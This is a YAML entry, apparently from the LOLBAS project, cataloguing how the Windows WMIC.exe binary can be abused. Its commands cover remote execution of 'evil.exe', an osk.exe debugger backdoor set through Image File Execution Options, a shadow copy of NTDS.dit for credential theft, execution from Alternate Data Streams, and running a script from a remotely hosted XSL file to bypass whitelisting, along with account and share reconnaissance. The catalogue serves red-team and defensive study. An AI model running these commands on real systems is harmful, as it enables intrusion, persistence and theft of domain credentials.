LOLBAS/yml/OSBinaries/Wmic.yml

47 lines
2.9 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

---
Name: WMIC.exe
Description: Reconnaissance, Execute, Read ADS
Author: ''
Created: '2018-05-25'
Categories: []
Commands:
- Command: wmic.exe process call create calc
Description: Execute calc.exe.
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS).
- Command: wmic.exe useraccount get /ALL
Description: List the user accounts on the machine.
- Command: wmic.exe process get caption,executablepath,commandline
Description: Gets the command line used to execute a running program.
- Command: wmic.exe qfe get description,installedOn /format:csv
Description: Gets a list of installed Windows updates.
- Command: wmic.exe /node:"192.168.0.1" service where (caption like "%sql server (%")
Description: Check to see if the target system is running SQL.
- Command: get-wmiobject class "win32_share" namespace "root\CIMV2" computer "targetname"
Description: Use the PowerShell cmdlet to list the shares on a remote server.
- Command: wmic.exe /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
Description: Execute evil.exe on the remote system.
- Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm.
- Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
Description: Create a volume shadow copy of NTDS.dit that can be copied.
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
Description: Execute a script contained in the target .XSL file hosted on a remote server.
- Command: wmic.exe os get /format:"MYXSLFILE.xsl"
Description: Executes JScript or VBScript embedded in the target XSL stylesheet.
- Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
Full Path:
- c:\windows\system32\wbem\wmic.exe
- c:\windows\sysWOW64\wbem\wmic.exe
Code Sample: []
Detection: []
Resources:
- https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
- https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
- https://twitter.com/subTee/status/986234811944648707
Notes: Thanks to Casey Smith - @subtee